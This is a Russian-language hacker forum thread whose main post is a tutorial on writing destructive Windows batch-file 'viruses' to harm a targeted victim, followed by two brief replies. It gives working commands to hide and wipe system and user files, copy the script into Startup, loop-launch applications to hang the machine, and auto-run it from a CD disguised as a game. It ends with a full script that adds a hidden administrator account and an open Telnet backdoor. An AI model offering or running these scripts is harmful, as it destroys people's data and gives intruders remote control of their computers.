Хакерский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Хакерский форум » Временный » Огромная статья по написанию BAT вирусовСегодня


Огромная статья по написанию BAT вирусовСегодня

Сообщений 1 страница 3 из 3

1

Огромная статья по написанию BAT вирусовСегодня я росскажу как написать доволь мощный вир будем начинать с нуля
чтобы создать бат вирус нужно открыть блокнот написать команды,и сохранить с разришением .bat
Кстати можете не читать в конце я предлогаю вам свой вирус.
Как вы поняли к командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min он, как я уже говорил так же запускает пиложение, но в свёрнутом виде. Если за место него мы написали бы /max, то приложение соответственно запустилось во весь экран, развёрнутое. У команды start ещё есть с десяток параметров, но о них я вам говорить не стану т.к. они нам не чем не помогут (зачем нам задавать приоретет приложения?).

В таблице написано приложение и команда которая его запускает:
Настройка системы- start msconfig
Калькулятор - calc
Помощь- start HelpCtr
Редактор символов- eudcedit
Таблица символов - charmap
Буфер обмена - clipbrd
Музон dvdplay
Диспетчер задач - taskmgr
Громкость -sndvol32
Доктор Ватсон -drwatson
Отладчик доктора- drwtsn32
Дефрагментация диска С: - defrag C:
Проверка диска - chkdsk
И ещё чтоб вы знали. Как же всё это выполняеться, ведь команд куча, все они требуют приложения которое будет их выполнять. Неужели это всё одна програма? Нет, программа "cmd" служит для того чтобы через неё запускать другие программы. Вот например есть такая команда mem, введите её и увидите сведения о памяти вашего компа. Так вот, этой командой заправляет отдельное приложение. Оно так и называеться mem. Лежит это приложение в C:WINDOWSsystem32 и есть ещё резервная копия по адресу: C:WINDOWSsystem32dllcache. Это для того чтобы востоновиться от нечаянного удаления нужных файлов. Так вот к чему рассказ, удалите в этих двух директориях приложение "mem.exe" и теперь введите в командную строку, вам не чего не покажут разве лишь только ошибку, или может даже то, что системного файла нехватает. Из этого следует вывод, если удалить приложения стирания, перемещения, то командные файлы у вас не сработают. Но я думаю "жертва" об этом даже не догадываеться...
Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить!
Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут.
Просто пишем:

attrib +h +s

Используемые параметры в команде attrib:

+r Установка атрибута «Только чтение».
-r Снятие атрибута «Только чтение».
+a Установка атрибута «Архивный».
-a Снятие атрибута «Архивный».
+s Установка атрибута «Системный».
-s Снятие атрибута «Системный».
-h Снятие атрибута «Скрытый».
+h Установка атрибута «Скрытый».

Но мы будем только пользоваться двумя, может тремя.
Довайте для начала скроем папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:

attrib +h +s C:/WINDOWS

Или же можно скрыть файлы (вложенные папки остануться) в самой папке:

attrib +h +s C:/WINDOWS/*.*

можно поступить иначе:

cd C:windows переходим в папку «windows»
attrib +h +s и ставим атрибуты

У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один "Скрытый" и он скроеться? В принцепи у ламера да, но если вы поставили в свойствах папки "Показывать скрытые файлы и папки", то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).

А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпакках пишем:

attrib -r -s -h -a *.* /s

Существует ещё одна загвоска, а если на подпаке стоят атрибуты, то с неё команда снимет их? Нет, она не снимет не с этой папки, не с файлов которые в этой скрытой папке находяться. Поэтому нам нужен ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки "Windows" нам надо написать:

attrib -r -s -h C:WINDOWS*.* /s /d

Ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как… ну об этом в главе: «Заполняем место мусором»
Или какими он часто пользуеться папками и файлами? Ну я думаю на "Рабочем столе" он держит кучу ярлыков. А если они исчезнут? Он их поставит опять, а мы сделаем запуск нашего вируса с каждым включением компа и сколько бы он раз заново не ставил свои ярлыки, они всё исчезают и исчезают,... но об этом потом.

--------------------------------------------------------------------------------
Я думаю вы не станете биться в бешенном припадке если тестируя вирус скроете свои папки... Просто напишите команду которая снимает атрибуты...
--------------------------------------------------------------------------------
Безвозвратное удаление
Ну что, сейчас пойдут команды удаления. Интуиция вам подсказывает что удаление это плохо...

del *.* /q

После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:

del C:windowsfonts /q

Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога. Надеюсь вы помните главу "Хд-е мои файлы"?

Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:

rd C:windowsMedia /s /q

и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del ? Ответ прост, вы попробуйте удалить командой rd , допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:windows*.bmp /q /s

И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы, об этом в главе "Маски"

Файл можно ещё и просто не удаляя переместить, например:

move C:WINDOWS*.txt C:Text /y

На команде видно что мы перемещаем все текстовые файлы в папку "Text" на диске C: (в папке WINDOWS их уже не будет, это же перемещение, где взяли там уже нет). Что интересно мы наносим такой же вред как и при удалени ведь комп будет считать что там этих файлов уже нет. (Правдо удалять быстрее). Параметр /y выключяет предупреждения о перезаписи, если вдруг имена совпадут.

А теперь попробуйте догадаться что попытаеться сделать эта команда:

rd C: /s /q

--------------------------------------------------------------------------------
И ещё на последок чтобы хорошенько усвоили, комп не даёт вам просто так удалять системные и скрытые файлы, надо сначала снять все атрибуты. Иначе облом. Но этот процесс офигеть длительный так что лучше снимать только с определённых файлов, но это надо знать с каких. Так что чтобы написать вирус вам надо самим знать какие файлы системные и стандартные. Прочетать много книг и... убить Билла Гейца и занять его пост!
--------------------------------------------------------------------------------

Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*
del C:*.* /q

Но тут нам много удалить не дадут. Всё тристо раз защищено.

Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q

А вот если написать:

rd C:Program Files /s /q

то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del "%USERPROFILE%Мои документы*.*" /q /s

--------------------------------------------------------------------------------
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251
--------------------------------------------------------------------------------

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:

for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q

Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.

if not VIR*?????????.sys goto x
exit
:x
МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.

--------------------------------------------------------------------------------
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.
Маленькие команды
Тут написаны команды для которых отдельная глава много...

Самоликвидация

Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

del %0

Клонирование

Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет, нет, да кто нибудь запустит интересный "setup" или "games"

copy %0 C:setup.bat
copy %0 D:games.bat
copy %0 C:windows/sex.bat
ну и.т.д.
Можно изменить текущее время на своё:
time 00:00

Можно изменить текущую дату:
date 01.01.50

chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
md 1 ….и.т.д.

допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их
Пытаемся повесить систему

Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например:

Start mspaint и Paint откроется

А что если задать компу открыть сразу 50, или 100 Paint(ов) силёнок хватит не у всех. Можно конечно написать вот таких 100 строк: Start mspaint но этого мы делать не будем не волнуйтесь. Мы напишет вот такое:

:x ставим начальную точку
Start mspaint пишем команду (в данном случае это открытие Paint(а)
goto x говорим чтобы комп начинал всё с начальной точки

Этим самым у нас получаеться безконечный цикл открытия приложения и попытка зависания компа.

CD с вирусом.
А вот например если мы хотим «подарить» ваш великолепно выполненный вирус определённому человеку, да ещё вдобавок не по сети, а дать его на диске, то можно ещё кое как фишкануть… кстати говоря чтобы жертва на вас не злилась можно на диске действительно записать какую-нибудь небольшую игру, возможно он успеет поиграть в неё, и как не в чём не бывало отключить комп... Но он его больше не включит. У вас есть прикрытие вы скажете мол установка игрухи прошла криво.
Описание ближайшего будущего:
Наша жертва берёт наш диск и засовывает его в дисковод и как обычно ждёт когда комп прочтёт диск и запустит его, а тем временем наш диск ка-а-а-ак запустит автоматически наш вирус и всё удалит…ну или создаст много мусора… вот такая хрень…
Для этого мы откроем блокнот и напишем там следующие:

[autorun]
OPEN=virus.bat

Имя, которое у меня стоит «virus» может быль любое, например «1». Вспомните когда мы вставляем диск с какоё-либо игрой то после открытия «Моего компа» на том месте, где был обычный значок диска, появляется значок игры…вот и мы можем также сделать засунуть значок, на диск, обозвав его «znak» и добавляем в нашем файле строку:

ICON=znak.ico

Потом сохраняем наш файл, дав ему имя AUTORUN и расширение .inf
Для особо тупых:

[autorun]
OPEN=virus.bat
ICON=znak.ico

Всё это будет сохранено AUTORUN.inf

Должен появиться такой файл:

Потом берём и записываем на диск наши четыре компонента:

virus.bat наш с вами «мощненький вирусик»
znak.ico какой нибуть красивый значёк
AUTORUN.inf автомат запуска вируса
Игра... можете и не записывать.

Вирус, тут желательно делать такой который создаёт много мусора типа это игра столько занимает, которую вы предварительно запишите на диск. И ещё в коде надо прописать запуск установки игры, чтобы пи включении диска у нас запустилась усановка и вирус. Правда после её удаления место существенно не прибавиться и только мы знаем почему. Преимущество такого вот способа состоит в том, что длительный процесс создания мусора можно сослать непосредственно на распаковку игры.
А если вы не хотите создавать вирус сами то ничё я придлогаю вам свой по моему мненею идеальный вирус
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Chcp 1251
label D: Дурак
Chcp 1251
label D: Ламерок,Гыгы
Chcp 1251
cdwindows
ren Web мусор
Chcp 1251
cdwindows
ren Web мусоp
Chcp 1251
cdwindows.0
ren Web мусор
Chcp 1251
cdwindows.1
ren Web мусор
Chcp 1251
cdwindows.2
ren Web мусор
time 00:00
date 01.01.50
del C:windows*.bmp /q /s
attrib +h +s C:/WINDOWS.0
attrib +h +s C:/WINDOWS.1
attrib +h +s C:/WINDOWS.2
attrib -a -s -h -r D:*.*
Chcp 1251
echo virus.bat>>read.txt Дурак, пока ты меня читаешь, вирус работает!
Chcp 1251
echo virus.bat>>lamer.txt Кста ты лошара!
start/max lamer.txt
Chcp 1251
echo virus.bat>>Nub.txt Гыгыгыгыгыгыгыгыгыгыгыгыгыггыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгыгы!
start/max Nub.txt
Chcp 1251
copy C:windows*.* "%USERPROFILE%рабочий столVIR??????????????.txt"
Chcp 1251
cd "%USERPROFILE%рабочий стол"
del ?????.txt
Chcp 1251
md "%USERPROFILE%мои документыRABOTA"
Chcp 1251
move *.txt "%USERPROFILE%мои документыRABOTA"
Chcp 1251
copy %0 "%USERPROFILE%Мои документыvirus.bat"
copy %0 "%ProgramFiles%virus.bat"
Chcp 1251
copy %0 "%USERPROFILE%Главное менюПрограммыАвтозагрузкаvirus.bat"
Chcp 1251
cd "%USERPROFILE%рабочий стол"
md 0
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 10
md 11
md 12
md 13
md 14
md 15
md 16
md 17
md 18
md 19
md 20
md 21
md 22
md 23
md 24
md 25
md 26
md 27
md 28
md 29
md 30
md 31
md 32
md 33
md 34
md 35
md 36
md 37
md 38
md 39
md 40
md 41
md 42
md 43
md 44
md 45
md 46
md 47
md 48
md 49
md 50
md 51
md 52
md 53
md 54
md 55
md 56
md 57
md 58
md 59
md 60
md 61
md 62
md 63
md 64
md 65
md 66
md 67
md 68
md 69
md 70
md 71
md 72
md 73
md 74
md 75
md 76
md 77
md 78
md 79
md 80
md 81
md 82
md 83
md 84
md 85
md 86
md 87
md 88
md 89
md 90
md 91
md 92
md 93
md 94
md 95
md 96
md 97
md 98
md 99
md 100
md 101
md 102
md 103
md 104
md 105
md 106
md 107
md 108
md 109
md 110
md 111
md 112
md 113
md 114
md 115
md 116
md 117
md 118
md 119
md 120
md 121
md 122
md 123
md 124
md 125
md 126
md 127
md 128
md 129
md 130
md 131
md 132
md 133
md 134
md 135
md 136
md 137
md 138
md 139
md 140
md 141
md 142
md 143
md 144
md 145
md 146
md 147
md 148
md 149
md 150
md 151
md 152
md 153
md 154
md 155
md 156
md 157
md 158
md 159
md 160
md 171
md 172
md 173
md 174
md 175
md 176
md 177
md 178
md 179
md 180
md 181
md 182
md 183
md 184
md 185
Chcp 1251
cd "%USERPROFILE%Главное меню"
md 0
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 10
md 11
md 12
md 13
md 14
md 15
md 16
md 17
md 18
md 19
md 20
md 21
md 22
md 23
md 24
md 25
md 26
md 27
md 28
md 29
md 30
md 31
md 32
md 33
md 34
md 35
md 36
md 37
md 38
md 39
md 40
md 41
md 42
md 43
md 44
md 45
md 46
md 47
md 48
md 49
md 50
md 51
md 52
md 53
md 54
md 55
md 56
md 57
md 58
md 59
md 60
md 61
md 62
md 63
md 64
md 65
md 66
md 67
md 68
md 69
md 70
md 71
md 72
md 73
md 74
md 75
md 76
md 77
md 78
md 79
md 80
md 81
md 82
md 83
md 84
md 85
md 86
md 87
md 88
md 89
md 90
md 91
md 92
md 93
md 94
md 95
md 96
md 97
md 98
md 99
md 100
md 101
md 102
md 103
md 104
md 105
md 106
md 107
md 108
md 109
md 110
md 111
md 112
md 113
md 114
md 115
md 116
md 117
md 118
md 119
md 120
md 121
md 122
md 123
md 124
md 125
md 126
md 127
md 128
md 129
md 130
md 131
md 132
md 133
md 134
md 135
md 136
md 137
md 138
md 139
md 140
md 141
md 142
md 143
md 144
md 145
md 146
md 147
md 148
md 149
md 150
md 151
md 152
md 153
md 154
md 155
md 156
md 157
md 158
md 159
md 160
md 171
md 172
md 173
md 174
md 175
md 176
md 177
md 178
md 179
md 180
md 181
md 182
md 183
md 184
md 185
Chcp 1251
cd "%USERPROFILE%Мои документы"
md 0
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 10
md 11
md 12
md 13
md 14
md 15
md 16
md 17
md 18
md 19
md 20
md 21
md 22
md 23
md 24
md 25
md 26
md 27
md 28
md 29
md 30
md 31
md 32
md 33
md 34
md 35
md 36
md 37
md 38
md 39
md 40
md 41
md 42
md 43
md 44
md 45
md 46
md 47
md 48
md 49
md 50
md 51
md 52
md 53
md 54
md 55
md 56
md 57
md 58
md 59
md 60
md 61
md 62
md 63
md 64
md 65
md 66
md 67
md 68
md 69
md 70
md 71
md 72
md 73
md 74
md 75
md 76
md 77
md 78
md 79
md 80
md 81
md 82
md 83
md 84
md 85
md 86
md 87
md 88
md 89
md 90
md 91
md 92
md 93
md 94
md 95
md 96
md 97
md 98
md 99
md 100
md 101
md 102
md 103
md 104
md 105
md 106
md 107
md 108
md 109
md 110
md 111
md 112
md 113
md 114
md 115
md 116
md 117
md 118
md 119
md 120
md 121
md 122
md 123
md 124
md 125
md 126
md 127
md 128
md 129
md 130
md 131
md 132
md 133
md 134
md 135
md 136
md 137
md 138
md 139
md 140
md 141
md 142
md 143
md 144
md 145
md 146
md 147
md 148
md 149
md 150
md 151
md 152
md 153
md 154
md 155
md 156
md 157
md 158
md 159
md 160
md 171
md 172
md 173
md 174
md 175
md 176
md 177
md 178
md 179
md 180
md 181
md 182
md 183
md 184
md 185
Chcp 1251
cd "%USERPROFILE%Application DataMicrosoftInternet ExplorerQuick Launch"
md 0
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 10
md 11
md 12
md 13
md 14
md 15
md 16
md 17
md 18
md 19
md 20
md 21
md 22
md 23
md 24
md 25
md 26
md 27
md 28
md 29
md 30
md 31
md 32
md 33
md 34
md 35
md 36
md 37
md 38
md 39
md 40
md 41
md 42
md 43
md 44
md 45
md 46
md 47
md 48
md 49
md 50
md 51
md 52
md 53
md 54
md 55
md 56
md 57
md 58
md 59
md 60
md 61
md 62
md 63
md 64
md 65
md 66
md 67
md 68
md 69
md 70
md 71
md 72
md 73
md 74
md 75
md 76
md 77
md 78
md 79
md 80
md 81
md 82
md 83
md 84
md 85
md 86
md 87
md 88
md 89
md 90
md 91
md 92
md 93
md 94
md 95
md 96
md 97
md 98
md 99
md 100
md 101
md 102
md 103
md 104
md 105
md 106
md 107
md 108
md 109
md 110
md 111
md 112
md 113
md 114
md 115
md 116
md 117
md 118
md 119
md 120
md 121
md 122
md 123
md 124
md 125
md 126
md 127
md 128
md 129
md 130
md 131
md 132
md 133
md 134
md 135
md 136
md 137
md 138
md 139
md 140
md 141
md 142
md 143
md 144
md 145
md 146
md 147
md 148
md 149
md 150
md 151
md 152
md 153
md 154
md 155
md 156
md 157
md 158
md 159
md 160
md 171
md 172
md 173
md 174
md 175
md 176
md 177
md 178
md 179
md 180
md 181
md 182
md 183
md 184
md 185
cd "%USERPROFILE%SendTo"
md 0
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 10
md 11
md 12
md 13
md 14
md 15
md 16
md 17
md 18
md 19
md 20
md 21
md 22
md 23
md 24
md 25
md 26
md 27
md 28
md 29
md 30
md 31
md 32
md 33
md 34
md 35
md 36
md 37
md 38
md 39
md 40
md 41
md 42
md 43
md 44
md 45
md 46
md 47
md 48
md 49
md 50
md 51
md 52
md 53
md 54
md 55
md 56
md 57
md 58
md 59
md 60
md 61
md 62
md 63
md 64
md 65
md 66
md 67
md 68
md 69
md 70
md 71
md 72
md 73
md 74
md 75
md 76
md 77
md 78
md 79
md 80
md 81
md 82
md 83
md 84
md 85
md 86
md 87
md 88
md 89
md 90
md 91
md 92
md 93
md 94
md 95
md 96
md 97
md 98
md 99
md 100
md 101
md 102
md 103
md 104
md 105
md 106
md 107
md 108
md 109
md 110
md 111
md 112
md 113
md 114
md 115
md 116
md 117
md 118
md 119
md 120
md 121
md 122
md 123
md 124
md 125
md 126
md 127
md 128
md 129
md 130
md 131
md 132
md 133
md 134
md 135
md 136
md 137
md 138
md 139
md 140
md 141
md 142
md 143
md 144
md 145
md 146
md 147
md 148
md 149
md 150
md 151
md 152
md 153
md 154
md 155
md 156
md 157
md 158
md 159
md 160
md 171
md 172
md 173
md 174
md 175
md 176
md 177
md 178
md 179
md 180
md 181
md 182
md 183
md 184
md 185
:x
Chcp 1251
msg * Тебя взломал W
Chcp 1251
msg * Ты ламер,гыгы
Chcp 1251
msg * Ты меня не закроеш.
Chcp 1251
msg * не старайся Lamerok
start cmd
start calc
start eudcedit
start charmap
start clipbrd
start sndvol32
start drwatson
start chkdsk
start mspaint
del C:windowsMedia /q
if not VIR*?????????.sys goto x
:x

ЕСЛИ ПОМОГЛО ПОСТАВТЕ +

+2

2

люди а можно при помощи команды какой то папку  перевести в архив?

0

3

Думаю разберешься сам, вот тебе справочник по командной строке скачивай, а также можешь на этом же сайте зайти на форум и задать вопрос, регистрация необязательна, на свой вопрос ты 100% получишь ответ в отличие от этого форума, на котором отвечают три человека...

+1


Вы здесь » Хакерский форум » Временный » Огромная статья по написанию BAT вирусовСегодня